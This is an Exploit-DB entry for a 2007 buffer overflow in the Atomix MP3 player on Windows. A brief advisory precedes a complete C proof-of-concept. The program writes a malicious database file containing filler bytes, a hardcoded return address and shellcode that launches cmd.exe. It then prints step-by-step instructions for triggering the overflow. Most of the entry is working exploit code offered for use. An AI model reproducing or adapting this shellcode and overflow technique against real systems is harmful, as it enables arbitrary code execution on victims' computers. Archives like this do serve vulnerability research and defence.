Atomix MP3 - '.MP3' File Buffer Overflow

EDB-ID:

29942


Type:

dos


Platform:

Windows

Date:

2007-05-02


// source: https://www.securityfocus.com/bid/23756/info

Atomix MP3 is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.

An attacker could exploit this issue by enticing a victim to load a malicious MP3 file. If successful, the attacker can execute arbitrary code in the context of the affected application.

////////////////////////////////// [ STARTING CODE ]
////////////////////////////////////////////////////
////
////  [ Explanation ] this probe of concept make 
////  a malicious file that exploit the error.
////  
////
////  [ Note ] 
////  it was coded for Windows XP with SP2-es
////  if you want to try it into your own PC
////  it is necessary that you change this Offsets 
////  for your own offsets.
////
////     on: 
////  char offset[]="";
////     AND
////  mov ebx,0x77BF93C7
////
////                Enjoy it n_nU!..
////    Coded by preth00nker (using Mexican skill!)

#include <stdio.h>
#include <conio.h>
#include <string.h>

char shellcode[] =     //A simple CMD Call =)
"\x55"                 //push ebp
"\x8B\xEC"             //mov ebp,esp
"\x33\xFF"             //xor edi,edi
"\x57"                 //push edi
"\xC6\x45\xFC\x63"     //mov byte ptr [ebp-04h],63h
"\xC6\x45\xFD\x6D"     //mov byte ptr [ebp-03h],6Dh
"\xC6\x45\xFE\x64"     //mov byte ptr [ebp-02h],64h
"\x8D\x45\xFC"         //lea eax,[ebp-04h]
"\x50"                 //push eax
"\xBB\xC7\x93\xBF\x77" //mov ebx,0x77BF93C7
"\xFF\xD3";            //call ebx


                       /*Evilbuffer - 520 Bytes Free4exploit*/
char evilbuffer[521] = "";
                       /*Data Base for songs found into the computer*/
char file[]          = "mp3database.txt"; 
                       /*Call ESP SP2-es*/
char offset[]        = "\x8B\x51\x81\x7C";
char temp[1024];

int main(){
    printf("\n\n##################################################\n");
    printf("######\n");    
    printf("######          Exploit Atomix 2.3\n");    
    printf("######             By Preth00nker\n");    
    printf("######     Preth00nker [at] gmail [dot] com\n");    
    printf("######         http://www.mexhackteam.org\n\n\n");
    printf("######         http://www.prethoonker.tk\n\n\n");
    FILE *fich;
   	memset(evilbuffer,'M',520);
    fich=fopen(file,"w+");
    printf(" (*) Creating the file: %s\n", file);
    strcpy(temp,evilbuffer);
    printf(" (*) Adding the evilbuffer\n");
    strcat(temp,offset);
    printf(" (*) Adding the Offset: %s\n", offset);
    strcat(temp,shellcode);
    printf(" (*) Adding the Sellcode\n");
    fwrite(temp, strlen(temp),1, fich);
    printf(" (*) Writting into the file\n");
    printf("      [ Usage: ]\n");    
    printf("Step 1.- Generate the Evil File into the %ProgramFiles%\\AtomixMP3\\ \n");    
    printf("Step 2.- Run atomixmp3.exe\n");    
    printf("Step 3.- Click On Search module and Click (again) on the unique file found.\n");
    printf("have fun =)!");
    fclose(fich);   
    return 0;
}
////
////
////////////////////////////////////////// [ E O F ]
////////////////////////////////////////////////////